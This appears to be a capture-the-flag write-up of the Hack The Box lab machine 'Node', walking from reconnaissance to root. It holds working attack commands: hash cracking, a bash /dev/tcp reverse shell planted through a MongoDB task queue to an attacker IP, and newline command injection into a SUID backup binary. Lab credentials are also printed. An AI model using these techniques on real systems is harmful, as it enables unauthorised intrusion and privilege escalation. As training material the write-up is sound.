Node (Medium)
Last updated
Last updated
Vulnerable Exploit: Unrestricted access to sensitive information and Weak password policy
System Vulnerable: 10.10.10.58
Vulnerability Explanation: Fuzzing the hidden files and directories which exposed the URL path to API contained list of users and password hashes. Due to weak password set that could allow to crack and gain access to backup file that stored user credential.
Privilege Escalation Vulnerability: Misconfigure group permission on backup
Vulnerability Fix: Restricted access to sensitive Path and implement strong password policy
Severity: High
Step to Compromise the Host:
Start with scanning all TCP port.
└─$ sudo nmap -p- --min-rate 10000 10.10.10.58 > nmap.txt
└─$ cat nmap.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-07 03:35 EST
Nmap scan report for 10.10.10.58
Host is up (0.077s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open pppFilter out all unnecessary character and just grep only open port.
└─$ cat nmap.txt | grep open | awk -F / '{print $1}' | sed -z "s/\n/,/g" | head -c-1
22,3000 └─$ nmap -sC -sV -T4 -p22,3000 10.10.10.58 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-07 03:36 EST
Nmap scan report for 10.10.10.58
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel└─$ nmap -sV -p22,3000 10.10.10.58 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-07 03:49 EST
Nmap scan report for 10.10.10.58
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelFirst I will check on webpage. By going through port 3000, it displays a webpage of myplace.
By clicking on each user profiles, it doesn't return anything interest. There is a login option. By viewing the source code also no comment need to notice.
By running discovery hidden directory we didn't find any interest.
└─$ feroxbuster -u http://10.10.10.58:3000
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.58:3000
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
WLD 90l 249w 3861c Got 200 for http://10.10.10.58:3000/d07d3890615d4d00933a2596c31d7303 (url length: 32)
WLD - - - Wildcard response is static; auto-filtering 3861 responses; toggle this behavior by using --dont-filter
WLD 90l 249w 3861c Got 200 for http://10.10.10.58:3000/93894b020e0c44c2a7cd77c55c739cd867505ed2d2404e2ba22ff83a53713f4722d6d1ff049a4300ab75280dbd59ed0f (url length: 96)
301 9l 15w 173c http://10.10.10.58:3000/uploads
301 9l 15w 171c http://10.10.10.58:3000/assets
301 9l 15w 177c http://10.10.10.58:3000/assets/js
301 9l 15w 179c http://10.10.10.58:3000/assets/css
301 9l 15w 187c http://10.10.10.58:3000/assets/js/misc
301 9l 15w 185c http://10.10.10.58:3000/assets/js/app
301 9l 15w 209c http://10.10.10.58:3000/assets/js/app/controllers
301 9l 15w 171c http://10.10.10.58:3000/vendor
301 9l 15w 185c http://10.10.10.58:3000/vendor/jquery
301 9l 15w 175c http://10.10.10.58:3000/partials
[####################] - 8m 299990/299990 0s found:12 errors:1396
[####################] - 7m 30001/29999 65/s http://10.10.10.58:3000
[####################] - 7m 29999/29999 65/s http://10.10.10.58:3000/uploads
[####################] - 7m 29999/29999 65/s http://10.10.10.58:3000/assets
[####################] - 7m 29999/29999 65/s http://10.10.10.58:3000/assets/js
[####################] - 7m 29999/29999 65/s http://10.10.10.58:3000/assets/css
[####################] - 7m 29999/29999 65/s http://10.10.10.58:3000/assets/js/misc
[####################] - 7m 29999/29999 65/s http://10.10.10.58:3000/assets/js/app
[####################] - 7m 29999/29999 66/s http://10.10.10.58:3000/vendor
[####################] - 7m 29999/29999 67/s http://10.10.10.58:3000/vendor/jquery
[####################] - 6m 29999/29999 79/s http://10.10.10.58:3000/partialsLet can back to the webpage and press Ctrl+Shift+C > Debugger. We can see there are some custom scripts.
Going through admin.js and /api/admin/backup, it returns authenticated False.
Going through home.js and /api/users/latest, we found there are 3 username and hash passwords and not admin account.
Again going through profiles.js, we found the code /api/users + $routeParams.username.
By following through /api/users, we found there are 4 users and 1 of them is admin.
Let grep all the hashes and try to crack them if they are using weak password. Go to crackstation and paste all the hashes in. Immediately, we found there 3 hashes were cracked.
└─$ curl -s 10.10.10.58:3000/api/users | jq -r '.[].password'
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0Login with user and password on the webpage, it works. Once, we are in, it allows us to download Backup files. Let download and check if there is any interesting.
Checking the file type and it contained ASCII text with very long lines.
└─$ file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminatorsm
└─$ wc -l myplace.backup
0 myplace.backup
└─$ wc -m myplace.backup
3459880 myplace.backupChecking the content on files and seem like it's base64 encoded.
└─$ head -c100 myplace.backup
UEsDBAoAAAAAAHtvI0sAAAAAAAAAAAAAAAAQABwAdmFyL3d3dy9teXBsYWNlL1VUCQADyfyrWfegh2F1eAsAAQQAAAAABAAAAABQ
└─$ cat myplace.backup | od -cvAnone -w1 | sort -bu | tr -d '\n' | tr -d ' '
+/=0123456789aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ Again check the file type is ZIP. Listing the file content in the zip folder.
└─$ file myplace.back.decode 2 ⨯
myplace.back.decode: Zip archive data, at least v1.0 to extract
└─$ unzip -l myplace.back.decode
Archive: myplace.back.decode
Length Date Time Name
--------- ---------- ----- ----
0 2017-09-03 08:59 var/www/myplace/
21264 2017-09-01 19:10 var/www/myplace/package-lock.json
0 2017-09-01 19:10 var/www/myplace/node_modules/
0 2017-09-01 19:10 var/www/myplace/node_modules/serve-static/
7508 2017-02-24 21:17 var/www/myplace/node_modules/serve-static/README.md
4533 2017-02-25 18:11 var/www/myplace/node_modules/serve-static/index.js
1189 2017-02-24 21:01 var/www/myplace/node_modules/serve-static/LICENSE
8504 2017-08-06 01:45 var/www/myplace/node_modules/serve-static/HISTORY.md
2175 2017-09-01 19:10 var/www/myplace/node_modules/serve-static/package.jsonLet try to unzip the file but it requires the password which we don't know.
└─$ unzip myplace.back.decode
Archive: myplace.back.decode
[myplace.back.decode] var/www/myplace/package-lock.json password: We can use zip2john to grab the hash of the zip file.
└─$ /usr/sbin/zip2john myplace.back.decode 2>/dev/null | tee myplace.zip.hash
myplace.back.decode:$pkzip2$3*2*1*0*8*24*9c88*1223*9e0e24bcc2498c98f24ce04142016c67617a0e963abdd7c381c13918adee52822712e61d*1*0*8*24*37ef*0145*fe81ba228776f05e1139e2e1a9fea6354c87a73c7b519e1103b4b62713affef089e5b3a1*2*0*11*5*118f1dfc*94cb*67*0*11*118f*3d0f*6902f97145238389acd785b62b0077ce1e*$/pkzip2$::myplace.back.decode:var/www/myplace/node_modules/qs/.eslintignore, var/www/myplace/node_modules/serve-static/README.md, var/www/myplace/package-lock.json:myplace.back.decode
- 2>/dev/null (Don't display error message)
- tee (copy standard input to the file myplace.zip.hash)└─$ sudo john myplace.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
└─$ sudo john myplace.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=PKZIP
[sudo] password for pwned:
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (myplace.back.decode)
1g 0:00:00:00 DONE (2021-11-07 05:14) 5.882g/s 1084Kp/s 1084Kc/s 1084KC/s sandrea..joan08
Use the "--show" option to display all of the cracked passwords reliably
Session completed└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.back.decode
possible pw found: magicword ()
-D (Dictionary attack)
-p (Password File)Now we can Unzip the file. Enumerating on the file we extract, we found credentials on app.js.
└─$ cat app.js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';We are now can ssh to the machine with credentials of user mark.
└─$ ssh mark@10.10.10.58
mark@10.10.10.58's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ We are now on the machine but there is no flag of user mark. Enumerating on the machine, we found 3 users that allow /bin/bash.
mark@node:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bashFind user flag and we found it under user tom. By this, we will escalate to user tom or root.
mark@node:~$ locate user.txt
/home/tom/user.txt
mark@node:~$ ls -l /home/tom/user.txt
-rw-r----- 1 root tom 33 Sep 3 2017 /home/tom/user.txtLet check the service port running on the machine and process that user Tom's running.
mark@node:/tmp$ netstat -tupln
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::3000 :::* LISTEN -
mark@node:/tmp$ ps aux | grep tom
tom 1223 0.1 5.3 1019880 40400 ? Ssl 15:05 0:00 /usr/bin/node /var/www/myplace/app.js
tom 1228 0.0 5.9 1007544 45020 ? Ssl 15:05 0:00 /usr/bin/node /var/scheduler/app.jsWe can see service port 27017 listening on locally. Let check the content of both the files /var/www/myplace/app.js and /var/scheduler/app.js.
On /var/www/myplace/app.js we already check the content but /var/scheduler/app.js didn't.
mark@node:/tmp$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});The script will connect to mongo database. The function doc will run doc.cmd and delete the doc.
Let connect to mongo database with username and password.
mark@node:/tmp$ mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> db # show all the tables in databases
scheduler
> show collections # show collections in current database
tasks
> db.tasks.find() # list objects in collection tasks but there is no objectsLet now add reverse shell into object of tasks.
> db.tasks.insert({cmd: "bash -c 'bash -i >& /dev/tcp/10.10.14.31/5555 0>&1'"})
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6187f1e22700092779a3579b"), "cmd" : "bash -c 'bash -i >& /dev/tcp/10.10.14.31/5555 0>&1'" }Start our netcat listener on port 5555 and wait for sometimes the shell pop up.
└─$ nc -lvp 5555
listening on [any] 5555 ...
10.10.10.58: inverse host lookup failed: Unknown host
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.58] 37476
bash: cannot set terminal process group (1228): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ id
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
tom@node:/$ whoami
whoami
tomAs we can see the user Tom is a groups of admin.
Let check if there is misconfiguration of file permission.
tom@node:/$ find / -type f -perm -4000 -ls 2>/dev/null
259267 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
297906 80 -rwsr-xr-x 1 root root 81672 Jul 17 2017 /usr/lib/snapd/snap-confine
278211 44 -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
278959 40 -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
17884 420 -rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign
282088 16 -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
303364 20 -rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
258944 52 -rwsr-xr-x 1 root root 49584 May 17 2017 /usr/bin/chfn
281144 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
259007 76 -rwsr-xr-x 1 root root 75304 May 17 2017 /usr/bin/gpasswd
279006 36 -rwsr-xr-x 1 root root 32944 May 17 2017 /usr/bin/newgidmap
258946 40 -rwsr-xr-x 1 root root 40432 May 17 2017 /usr/bin/chsh
259166 136 -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
282096 24 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
259071 40 -rwsr-xr-x 1 root root 39904 May 17 2017 /usr/bin/newgrp
259082 56 -rwsr-xr-x 1 root root 54256 May 17 2017 /usr/bin/passwd
279005 36 -rwsr-xr-x 1 root root 32944 May 17 2017 /usr/bin/newuidmap
258636 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
258671 28 -rwsr-xr-x 1 root root 27608 Jun 14 2017 /bin/umount
278644 32 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
258637 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
278666 140 -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
258653 40 -rwsr-xr-x 1 root root 40128 May 17 2017 /bin/su
258622 40 -rwsr-xr-x 1 root root 40152 Jun 14 2017 /bin/mountWe can see there is one file set SUID with admin group.
303364 20 -rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backupWe should get back to the file app.js and found this path.
app.get('/api/admin/backup', function (req, res) {
if (req.session.user && req.session.user.is_admin) {
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
var backup = '';
proc.on("exit", function(exitCode) {
res.header("Content-Type", "text/plain");
res.header("Content-Disposition", "attachment; filename=myplace.backup");
res.send(backup);
});
proc.stdout.on("data", function(chunk) {
backup += chunk;
});
proc.stdout.on("end", function() {
});It looks like the script call out three arguments: -q, backupkey, __dirname.
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
[+] Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA== └─$ cat troll.txt| base64 -d > troll.zip
└─$ 7z e troll.zip
└─$ cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
But if we extract the file just specify root, it will display the correct content of root flag.
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root└─$ cat testing.txt | base64 -d > testing.zip
└─$ 7z e testing.zip/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "as
> /bin/bash
> asd"
zip warning: name not matched: as
zip error: Nothing to do! (try: zip -r -P magicword /tmp/.backup_2015693318 . -i as)
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@node:/# whoami
root
root@node:/# id
uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'abc\n/bin/bash\nabc')"
zip warning: name not matched: aaa
zip error: Nothing to do! (try: zip -r -P magicword /tmp/.backup_497775969 . -i aaa)
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@node:/# whoami
root Let start execute the file with following parameter. Otherwise, we could read the file properly. From , /root is bad characters, once we decode base64, it will show troll face.
